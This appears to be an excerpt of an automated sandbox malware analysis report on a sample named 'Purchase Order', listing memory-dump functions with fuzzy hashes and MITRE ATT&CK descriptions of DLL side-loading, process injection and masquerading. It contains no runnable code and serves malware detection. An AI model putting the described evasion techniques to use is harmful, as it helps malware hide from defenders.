Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3376cbfb9905b0aebb4d3002997860e3866106508a19e0dcf3cf48e9c22c75bc
Instruction ID: 8c78ea434b256d9ac6ea63598486b872b00ba8e9282de6da2af8f29f8a757b33
Opcode Fuzzy Hash: 3376cbfb9905b0aebb4d3002997860e3866106508a19e0dcf3cf48e9c22c75bc
Instruction Fuzzy Hash: B751CC71075306CFD7692F60A5AE23A7FB0FB0F327705AC0AB51E894488F310188AF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F0D3D0 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5639a311eb4b5ef36019d8b8143e03139e749b02708d5b93d690c0342954530b
Instruction ID: d145e0be5b5a259828ae61e41b2194a7c891dbc5e1767cd0ed4ef198c7619821
Opcode Fuzzy Hash: 5639a311eb4b5ef36019d8b8143e03139e749b02708d5b93d690c0342954530b
Instruction Fuzzy Hash: 1351AC71075346CFD7692F20A5AE23ABFB1FB0F327745AC0AB51E894488F311588AF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F0D719 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f2b57c8d08e66913933e10e3e208c8e989970d6a98d45415a35a40765a42b3d
Instruction ID: 2e800232b578c96066eb98630402139c6ef5fe27aee549878bc83eb086ff255a
Opcode Fuzzy Hash: 0f2b57c8d08e66913933e10e3e208c8e989970d6a98d45415a35a40765a42b3d
Instruction Fuzzy Hash: 8551E270E01208CFCB04DFA9D990AADBBF2FF89340F149529E505BB294DB38A841CF58

Uniqueness

Uniqueness Score: -1.00%

Function 02F0CD70 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c79a375b213c5766435fa5e5f8abdf2fbb14ea86d2911a8b546c848ca4fcdf4
Instruction ID: 93de455d6541e455df403bca86f93306def48c153880d5ae98f5a195e4c592ff
Opcode Fuzzy Hash: 8c79a375b213c5766435fa5e5f8abdf2fbb14ea86d2911a8b546c848ca4fcdf4
Instruction Fuzzy Hash: 11519474E01208DFCB44DFA9D58499DBBF2FF89310F248169E805AB365DB31A801CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02F03960 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c07a83aa82e3d4d470d25c76e8ca0ae838984fb29375509a19ee94f3d50028
Instruction ID: 32c6ca5f2791308de481c33175f8bae39e7b1c462a3a5d2c527259f6dea7421a
Opcode Fuzzy Hash: 22c07a83aa82e3d4d470d25c76e8ca0ae838984fb29375509a19ee94f3d50028
Instruction Fuzzy Hash: 6B517F74E01208CFCB48DFA9D99099DBBB2FF89310B209469E805AB364DB35AD41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0EED1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e3c4d1fc3674b238c05f6e2d9248c5387714e9b50454ebdc0668aeea13ff98
Instruction ID: 175b83e4ab78979422ecb0487eaa67e97bab6fae80838bb6187754a31c74c992
Opcode Fuzzy Hash: 24e3c4d1fc3674b238c05f6e2d9248c5387714e9b50454ebdc0668aeea13ff98
Instruction Fuzzy Hash: E251BF74E05228CFCB24DF64C984BEDBBB2BB89341F1055A9D409A7390DB39AE85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F09AC3 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3397502d82aee54d7a12cbb083d1e990c1dea7e0d49e0b5cb5d8a05ac9a7c36b
Instruction ID: a27a9431d6fed6a783dec15c66b7dfa200598f50503c591ea5c4c551f212ed03
Opcode Fuzzy Hash: 3397502d82aee54d7a12cbb083d1e990c1dea7e0d49e0b5cb5d8a05ac9a7c36b
Instruction Fuzzy Hash: CD41B271E04249DFCF15CFA5C884B9EBFB2EF49790F008155EA159B292E3B0E914EB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F06790 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66b4735e5294de55a3437e3b2523e3b8a4f74826f2e5380177bad0018642c74
Instruction ID: d6e8762f558f3c1076a6307eeeedc85e5de295d5361e303ef5dd44e318d1790a
Opcode Fuzzy Hash: d66b4735e5294de55a3437e3b2523e3b8a4f74826f2e5380177bad0018642c74
Instruction Fuzzy Hash: 7D41D131A00209DFCB148F64C944BAA7BFAEF44350F04846EEA15DB291DB74DD59EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F04E20 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe2d26c86296891ca73412fa60fbb044ba34ebd7668904de3c873d6a642a165
Instruction ID: 48dedc6fdbc03fe521aac3e39538d8374a45444b074a2b0a95a2799cc1b4c7c0
Opcode Fuzzy Hash: 3fe2d26c86296891ca73412fa60fbb044ba34ebd7668904de3c873d6a642a165
Instruction Fuzzy Hash: D731503160410AAFCF099F64D884AAF7BA7FB88251F504029FB159B394CF39DD55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F07740 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8a052dfe7add33fa7f36743217ffb40d3a9fa666c5334e032201b9ef0c29cc
Instruction ID: a9bb68afae405de7805aa69148ff27b5c1f6cffa00cdd99b7216b730c1401bde
Opcode Fuzzy Hash: fa8a052dfe7add33fa7f36743217ffb40d3a9fa666c5334e032201b9ef0c29cc
Instruction Fuzzy Hash: 9C21D630B0010147DB252A3989D4B7AA6DB9FC8698F2440B9DA06CB3D4DF25FC42F7C4

Uniqueness

Uniqueness Score: -1.00%

Function 02F0A869 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ced0fd02b79c782f66b12946e9238239afd0c516f1d6f606bfdbf4c364a77ac
Instruction ID: 638015f3ef217ad6f10756db8f80f067cb0d23d422a29b0aa5567f9f940c9ec9
Opcode Fuzzy Hash: 0ced0fd02b79c782f66b12946e9238239afd0c516f1d6f606bfdbf4c364a77ac
Instruction Fuzzy Hash: 9A317071F006058FCB04CF69C894AAEBBB6BF89354B158119E615AB3A5CB309C02DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02F020B8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd43c552e30bd2fd70b3a29cf463e2886a4f895fb6ca7d9ffb1abe62f29b8da
Instruction ID: e70a8ea06072a98c7e336d040f806bdd8d8055bd8f7e5d8991456613edb18577
Opcode Fuzzy Hash: cbd43c552e30bd2fd70b3a29cf463e2886a4f895fb6ca7d9ffb1abe62f29b8da
Instruction Fuzzy Hash: 1921B235A00206AFCB15CF34C594AAE77A5EF89690B10C01DEE0A9B298DB34EE45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 02F05AC8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba7e1a0797aa81156f275b0765e647aeeec7528cd3c2cfceb298fb9659d0a5ce
Instruction ID: f77bd5c0342ad880b89c4c4b953a90ed0cb72204e7b0a4723dd2c38ad02863e8
Opcode Fuzzy Hash: ba7e1a0797aa81156f275b0765e647aeeec7528cd3c2cfceb298fb9659d0a5ce
Instruction Fuzzy Hash: 9B21C3757005128BC7299E75D8D852EB7A2FB897A07544169EA06DB394CF74EC02DBC0

Uniqueness

Uniqueness Score: -1.00%

Function 0170D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075384863.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f293a5d4696a0a0d125df3ae4794a885e416e1a2e71b4257591c518de2c286
Instruction ID: f344a9bce0d59eb55be195fa21e4989d932a17f5a4b9947c4e76f5b30a1ae8fb
Opcode Fuzzy Hash: 03f293a5d4696a0a0d125df3ae4794a885e416e1a2e71b4257591c518de2c286
Instruction Fuzzy Hash: 56210071504304DFCB22DFA8C9C4B26FBA5EB84314F20C5A9E84D4B292C73AD446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 02F03A45 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e891222be7545653d15eaeb64d32ec592242835ffec076165abeced0f3d282
Instruction ID: 8fa78be50c2750bf9a4e279ceff844a3e717f4ed8d5e492697086502eb6b8c23
Opcode Fuzzy Hash: c7e891222be7545653d15eaeb64d32ec592242835ffec076165abeced0f3d282
Instruction Fuzzy Hash: 9B319678E11209CFCB44DFA8E69489DBBF6FF49305B2044A9E809AB364DB35AD45DF00

Uniqueness

Uniqueness Score: -1.00%

Function 02F04E11 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d32e1c38e445cce8a6cb0c9e4b9dd3bdd65533b028c6a5e7bb6f994eaf42d5f
Instruction ID: 51fbf8525dfc760b8b5774f3e10b93651e938f9cefcfd099622ef6fed978d0d9
Opcode Fuzzy Hash: 9d32e1c38e445cce8a6cb0c9e4b9dd3bdd65533b028c6a5e7bb6f994eaf42d5f
Instruction Fuzzy Hash: 8321903260410AAFCB199F74D884B6B3BA6FB88250F504029FB098B384CB78DC55D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F0DBD8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e1d146ad886b889793008aa2b4ef9444de9d115bf7ea31e777a3b5f47a6345a
Instruction ID: 898894ce90d62a43f21ea8e5ad63587c01602f870d1b02baec366b8c78a1bc95
Opcode Fuzzy Hash: 8e1d146ad886b889793008aa2b4ef9444de9d115bf7ea31e777a3b5f47a6345a
Instruction Fuzzy Hash: 06215E7090020A8FCB05DFA8DA8078EBFF2FB85314F10D279D155AB365DB785A45DB81

Uniqueness

Uniqueness Score: -1.00%

Function 02F01FB8 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5e4c2d639234e090e0806fe349672d00013b26f942c920669c208a0fe1ec99
Instruction ID: 6faaf04c6c0a68b6c3dc5db26e027fb8417afa214e98bee4965ccb0b76757a91
Opcode Fuzzy Hash: 5d5e4c2d639234e090e0806fe349672d00013b26f942c920669c208a0fe1ec99
Instruction Fuzzy Hash: 9F21D0B4D1020A8FCB44EFA8D9556EEBFF5FF48300F10512AE909B6254EB345A85DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F0DBE8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31844749c97f4c634a3198f57612478874c67e9c863db836e917cf8ea64c39c9
Instruction ID: 983f97acd61a3e24d3f978c4b961180c609d593c4edf1b03daf8a9384b1dc506
Opcode Fuzzy Hash: 31844749c97f4c634a3198f57612478874c67e9c863db836e917cf8ea64c39c9
Instruction Fuzzy Hash: C8113D70D002099FCB05EFB8D68069EBBF2FB84300F10D579D105A7359EB745A45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0170D03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075384863.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_170d000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 3509f7cadad78ba8be1f955b13a92c87fc3441674fbedf3e256c09cb024ba91c
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: B111BE75504344CFDB12CF54D9C4B15FFA1FB44318F24C6A9D8494B692C33AD44ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 02F0565F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0c8a736ea787ab78a0d4dd75248bd9c04b3c5c27a380c5f500e17e8c1e8018
Instruction ID: 7f22e009f5db097e289a310f4f4d6dce45ba8c6ffcbd790b58a7627c614f3016
Opcode Fuzzy Hash: be0c8a736ea787ab78a0d4dd75248bd9c04b3c5c27a380c5f500e17e8c1e8018
Instruction Fuzzy Hash: C601FE727002056FCB069E64DC549EF3FA7EBC9290B54802BF504DB280DE718C02DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F01F60 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6180d405f6be23adc85daf054567a421e221c8fe4272b30bf0a51d0149ec8a
Instruction ID: 1f85480a09a56bac09ae1e09e2df1a7449972d09333dd2fd21e3313d9482d4d8
Opcode Fuzzy Hash: ff6180d405f6be23adc85daf054567a421e221c8fe4272b30bf0a51d0149ec8a
Instruction Fuzzy Hash: 1E211274D0460A8FCB04EFA8D5995EEBFF1FF49300F10416AE905BB264EB345A85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F02068 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc21c68b2c085f8069e09b392b81dfc9417b2bafaece742ad72a04956b722039
Instruction ID: 43e2c2eb90efea9716ebe84ad909051959fb2ba91a307987b38a863665be92c4
Opcode Fuzzy Hash: bc21c68b2c085f8069e09b392b81dfc9417b2bafaece742ad72a04956b722039
Instruction Fuzzy Hash: 6FE08633E2122A53CB00A7A9ED116DEFBB8EFC2235F554533D51476144EB70269982A4

Uniqueness

Uniqueness Score: -1.00%

Function 02F02078 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bd446fb7f6f9c2e1baf8698614626af9817bed67319e919a6f254e6b6dc9ad
Instruction ID: f4ad74a97bf9ab54e41a911c88b5c0185c5ebc42f9a76bdc277d2c17e74f6bbf
Opcode Fuzzy Hash: 74bd446fb7f6f9c2e1baf8698614626af9817bed67319e919a6f254e6b6dc9ad
Instruction Fuzzy Hash: 69D02B31D2022B43CB00E7A1DC004DFF738EEC2220B404223D51037000FB302698C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 02F082B8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 20e4f32860d1833d2a57449b6dba12d6e27b8bb1eb88a368aae3800062c2e72d
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: F2C08C7360C2282AA234508E7C81EE3BB8CC3C53F4B210137FB5CE3381A8429C8051F4

Uniqueness

Uniqueness Score: -1.00%

Function 02F0A76D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7856dab8f533e970367d5ccde3334adaaade3c5a43b0796c9a85dbfc1e31f6fc
Instruction ID: e5c391d554d9eab3bc40f7c2cd9493402fa3900db57759dc141ad90baa44777f
Opcode Fuzzy Hash: 7856dab8f533e970367d5ccde3334adaaade3c5a43b0796c9a85dbfc1e31f6fc
Instruction Fuzzy Hash: FAD0173AB00008DFCF048F98E8408DDBBB6FB9C221B008016F921A3220CA319825DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F0CEFC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174e0e3709aadec39314f00f5765579ba65e47213ffd3d5b29cd2e0fcf2ad5a0
Instruction ID: f7fb19b4e9fe46e247966e0fe22592b6c42b6a7d40b4961430e8500cf3bf8e72
Opcode Fuzzy Hash: 174e0e3709aadec39314f00f5765579ba65e47213ffd3d5b29cd2e0fcf2ad5a0
Instruction Fuzzy Hash: 2CD04235E5401DCBCF24DFA8E5854ECBBB0EF48352F24542BE925A7211DB305555DF11

Uniqueness

Uniqueness Score: -1.00%

Function 02F05F00 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef20689006080910cf284a5f12fa1d2988630c702958292a3628010ce174479
Instruction ID: fc0c38bdc375cc24f60068d03640b86536d306b275ef53ba95d3dbc25f092758
Opcode Fuzzy Hash: cef20689006080910cf284a5f12fa1d2988630c702958292a3628010ce174479
Instruction Fuzzy Hash: DED05E759043454EC316EA74EF520553B22BA80209B9C45BAB4444A76AEA6D8D8C82A8

Uniqueness

Uniqueness Score: -1.00%

Function 02F05F10 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807f0c70cb0ea6eea8d919d9db3444fc056217a44c222644e2f4dbf9bf73855f
Instruction ID: fd885eef489575879f0d45a50db82c66457dad9ca9b94f8b8f3ce0aea34555b0
Opcode Fuzzy Hash: 807f0c70cb0ea6eea8d919d9db3444fc056217a44c222644e2f4dbf9bf73855f
Instruction Fuzzy Hash: 07C0C93055030A4EC555EB75EF455197A2AE6C0204B544538B1091A2299E7C588C4694

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02F0E310 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9a85ac6dca946d931cd57b12e4da4e5ffaffda42a619f5fca59642af91b73d
Instruction ID: 1fdca00d71a7d72dca778ba2b64af14daf230aab3cfbcc95501da6abd2104e65
Opcode Fuzzy Hash: be9a85ac6dca946d931cd57b12e4da4e5ffaffda42a619f5fca59642af91b73d
Instruction Fuzzy Hash: 1752AA74E01229CFDB64DF65C980B9DBBB2BB89300F1085EAD509AB394DB359E85DF40

Uniqueness

Uniqueness Score: -1.00%

Function 02F0E943 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eed1adb12c2b6fbf0d25c96f9171b980807255e06ed4d2c0dee1d5f0cf6e0b
Instruction ID: 52bfae62e43877b0db23d885c5c0daa4e271eb0820b2df07c20fe22a90398d52
Opcode Fuzzy Hash: b6eed1adb12c2b6fbf0d25c96f9171b980807255e06ed4d2c0dee1d5f0cf6e0b
Instruction Fuzzy Hash: 3BA19D74A01228CFDB64DF24C994B9ABBB2BF49300F1085EAD50EAB354DB359E84DF51

Uniqueness

Uniqueness Score: -1.00%

Function 02F0EB23 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 357e0be551e8640ab420e28b0bf8835851d84b9358713859af9f1b42d888b1ed
Instruction ID: 34d5ad55c1797316104475fcc5caf42d67a960fff576ca59ae906e47a77f22df
Opcode Fuzzy Hash: 357e0be551e8640ab420e28b0bf8835851d84b9358713859af9f1b42d888b1ed
Instruction Fuzzy Hash: 1151B474A01228CFCB68DF24C995B99B7B2FF4A301F5085EAD50AA7354CB359E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F060E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;kq, xrefs: 02F0611A
\;kq, xrefs: 02F060FE
\;kq, xrefs: 02F060F4
\;kq, xrefs: 02F06126

Memory Dump Source

Source File: 00000002.00000002.4075541348.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f00000_109__Purchase_Order.jbxd

Similarity

API ID:
String ID: \;kq$\;kq$\;kq$\;kq
API String ID: 0-2874455797
Opcode ID: adc5db4f2093a5fb60237f2f96dec6289ec4962c9fe67b6abf5add71ec11fe82
Instruction ID: 9b24907224b77940ddd7f1f3d13b304870f9d84c34a5480a59a1a7432fbee0a8
Opcode Fuzzy Hash: adc5db4f2093a5fb60237f2f96dec6289ec4962c9fe67b6abf5add71ec11fe82
Instruction Fuzzy Hash: 1201D431F40114CFDB208E2CC890A2677EFAF88AA47254069E206CB3F6DB71DC61D780

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

